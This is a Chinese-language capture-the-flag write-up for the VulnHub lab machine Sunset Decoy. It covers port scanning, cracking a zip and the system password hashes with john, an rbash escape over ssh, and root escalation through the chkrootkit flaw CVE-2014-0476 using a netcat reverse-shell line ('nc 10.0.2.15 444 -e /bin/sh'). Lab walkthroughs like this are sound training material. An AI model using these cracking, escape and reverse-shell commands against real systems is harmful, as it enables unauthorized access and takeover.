考点:暴力穷举,chkrootkit,rbash绕过
靶机链接:https://www.vulnhub.com/entry/sunset-decoy,505/
环境配置
名称 | IP |
---|
Kali Linux | 10.0.2.15 |
SUNSET DECOY | 10.0.2.13 |
初步打点
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| $ export rip=10.0.2.13
$ sudo nmap -v -A -p- $rip
Scanning localhost (10.0.2.13) [65535 ports]
Discovered open port 80/tcp on 10.0.2.13
Discovered open port 22/tcp on 10.0.2.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
|
WEB测试
查看80端口,下载save.zip
1
2
| $ zip2john save.zip >>save.txt
$ john save.txt --wordlist /usr/share/wordlists/rockyou.txt
|
得到zip压缩包密码manuel
解压缩得到一些文件
漏洞发现
尝试暴力破解系统密码
1
2
| $ unshadow passwd shadow >pass.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
|
获得权限
靶机测试
成功获得一个用户的密码
现在登陆上去是rbash
使用参数获得bash
1
| $ ssh 296640a3b825115a47b68fc44501c828@10.0.2.13 -t "bash -noprofile"
|
提权
chkrootkit
发现chkrootkit,尝试已存在漏洞CVE-2014-0476
1
2
3
| $ cd /tmp
$ echo "/usr/bin/nc 10.0.2.15 444 -e /bin/sh" > update
$ bash update
|
最后修改于 2020-07-07